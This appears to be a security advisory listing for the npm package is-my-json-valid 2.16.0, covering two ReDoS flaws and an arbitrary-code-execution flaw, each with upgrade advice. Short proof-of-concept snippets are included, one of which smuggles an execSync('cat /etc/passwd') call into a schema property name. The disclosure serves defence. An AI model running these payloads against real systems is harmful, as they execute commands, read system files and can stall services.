org.webjars.npm:is-my-json-valid@2.16.0 vulnerabilities

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the style format.

##PoC

const imjv = require('is-my-json-valid')
const validate = imjv({ maxLength: 100, format: 'style' })
console.log(validate(' '.repeat(1e4)))

Upgrade org.webjars.npm:is-my-json-valid to version 2.20.5 or higher.

Affected versions of this package are vulnerable to Arbitrary Code Execution via the formatName function.

##PoC

const schema = {
  type: 'object',
  properties: {
    'x[console.log(process.mainModule.require(`child_process`).execSync(`cat /etc/passwd`).toString(`utf-8`))]': {
      required: true,
      type:'string'
    }
  },
}
var validate = validator(schema);
validate({})

Upgrade org.webjars.npm:is-my-json-valid to version 2.20.5 or higher.

is-my-json-valid is a universal validation plugin.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. It used a regular expression (/^\S+@\S+$/) in order to validate emails. This can cause an impact of about 10 seconds matching time for data 90K characters long.

Upgrade is-my-json-valid to version 2.17.2, 1.4.1 or higher.